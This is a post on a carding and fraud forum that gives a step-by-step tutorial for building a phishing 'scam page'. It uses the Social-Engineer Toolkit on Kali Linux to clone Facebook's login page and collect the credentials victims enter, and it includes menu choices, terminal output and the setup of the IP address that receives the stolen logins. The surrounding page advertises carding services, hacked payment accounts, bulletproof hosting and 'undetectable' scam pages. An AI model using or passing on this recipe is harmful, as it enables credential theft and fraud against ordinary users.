Carding Forum, Carders Forum, Hackers Forum, Darknet Fraud, Best Hackers, Underground Hacking Forum
× You can find our backup domain links in case our current one becomes inaccessible at: www.cardingforum.link Forum Support Private Message Quata

REGISTER LOGIN REGISTER LOGIN




FORUM ESCROW BITCOIN ADDRESS | BUY ADVERTISEMENT | BECOME A VERIFIED VENDOR | Forum Support Private Message Quata

iphone carding   westernunion carding   Bank Transfers, PayPal Skrill Hacked   Hacked Carded Western Union, Bank Transfer, Money Gram Transfers

PayPal carding

 credit card forum
 Payoneer carding 
  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
how to make a scam page undetected and without get infected
#1
To make a scam page not detected, you dont need to download any page of anyone, without knowing the source
a scam page can infect you, or redirect data to the creator of the page
if you go to download it it mean it can hapened to you
Use kali linux and do it yourself

Social Engineering Toolkit

Humans are the weakest link in any security system ~Shashwat (That’ll be me)

Social engineering toolkit does not exploit vulnerability in the mechanism of any service. It exploits the weakness in the human element of security.

The Social-Engineer Toolkit (SET) was created and written by the founder of TrustedSec. It is an open-source Python-driven tool aimed at penetration testing around Social-Engineering. SET has been presented at large-scale conferences including Blackhat, DerbyCon, Defcon, and ShmooCon. With over two million downloads, SET is the standard for social-engineering penetration tests and supported heavily within the security community.

Kali Linux
I don’t feel the need to mention it, but I’ll still do it. You need Kali Linux to proceed with this tutorial.
Se-toolkit
Start Kali Linux. In a console/terminal type se-toolkit.
Something like this will show up


[email protected]:~# se-toolkit
[-] New set_config.py file generated on: 2021-05-26 08:26:33.526119
[-] Verifying configuration update…
[*] Update verified, config timestamp is: 2021-05-26 08:26:33.526119
[*] SET is using the new config, no need to restart

_______________________________
/ _____/\_ _____/\__ ___/
\_____ \ | __)_ | |
/ \ | \ | |
/_______ //_______ / |____|
\/ \/
[—] The Social-Engineer Toolkit (SET) [—]
[—] Created by: David Kennedy (ReL1K) [—]
[—] Version: 4.3.9 [—]
[—] Codename: ‘Turbulence’ [—]
[—] Follow us on Twitter: @trustedsec [—]
[—] Follow me on Twitter: @dave_rel1k [—]
[—] Homepage: https://www.trustedsec.com [—]
Welcome to the Social-Engineer Toolkit (SET). The one
stop shop for all of your social-engineering needs.

Join us on irc.freenode.net in channel #setoolkit
The Social-Engineer Toolkit is a product of TrustedSec.
Visit: https://www.trustedsec.com
Select from the menu:
1) Social-Engineering Attacks
2) Fast-Track Penetration Testing
3) Third Party Modules
4) Update the Metasploit Framework
5) Update the Social-Engineer Toolkit
6) Update SET configuration
7) Help, Credits, and About
99) Exit the Social-Engineer Toolkit
set>

Now type the following and press enter.
1 [enter] 2 [enter] 3 [enter]

Explanation

1 selects social engineering attacks. Obvious choice if you read the other options from 1 to 9 (and 99 for exit)
The 2 selects Website Attack Vectors. Not that obvious. The Web Attack module is a unique way of utilizing multiple web-based attacks in order to compromise the intended victim.
Then, the 3 selects Credential Harvestor. The Credential Harvester method will utilize web cloning of a web-site that has a username and password field and harvest all the information posted to the website.

Now you’ll be seeing something like this-

The first method will allow SET to import a list of pre-defined web
applications that it can utilize within the attack.
The second method will completely clone a website of your choosing
and allow you to utilize the attack vectors within the completely
same web application you were attempting to clone.
The third method allows you to import your own website, note that you
should only have an index.html when using the import website
functionality.
1) Web Templates
2) Site Cloner
3) Custom Import
99) Return to Webattack Menu

Type 2 to select site cloner.

Find your IP
On a new terminal type ifconfig. This will give you your ipv4 address, which is what you are looking for
Back to se-toolkit

Now it’ll ask you to specify the IP to which the data is supposed to be sent to. That’ll be your IP address. Since this is your internal IP address (i.e. local IP), the fake facebook page will work only for computers connected with your LAN.

Now it’ll ask for the page to be cloned. Enter https://www.facebook.com/.

set:webattack>2
[-] Credential harvester will allow you to utilize the clone capabilities within SET
[-] to harvest credentials or parameters from a website as well as place them into a report
[-] This option is used for what IP the server will POST to.
set:webattack> IP address for the POST back in Harvester/Tabnabbing:192.168.154.133
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone:https://www.facebook.com/


Now in your browser on Kali Linux, enter your IP. It will display facebook login page. Enter any info and press login. You will get the information in se-toolkit. If you are using VMWare or virtualbox, then you can try and enter the IP on the browsers there. It will work.
Live demonstration
To make sure that the demonstration is not just a repetition of what you already know, I have decided to clone the login page of facebook
Reply
Paid adv. expire in 28 days
CLICK to buy Advertisement !

    Verified & Trusted Selling Bulletproof Spamhaus Ignore - Dedicated Servers, VPS, Web Hosting



Possibly Related Threads…
Thread Author Replies Views Last Post
  Amazon scam page 2021 - undetectable uionet 5 11,687 Today,
Last Post: Dunson
  Netflix scam page 2021 uk with Letter - undetected uionet 1 19,061 Today,
Last Post: uionet
  HMRC Tax Refund Scam Page 2021 - undetectable uionet 1 52,809 Today,
Last Post: uionet
  Tax Refund ireland scam page 2021 - undetected uionet 1 49,431 Today,
Last Post: uionet

Forum Jump:


Users browsing this thread: 28 Guest(s)